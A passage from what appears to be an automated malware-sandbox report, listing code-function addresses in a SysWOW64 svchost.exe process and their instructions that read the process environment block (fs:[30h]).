            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
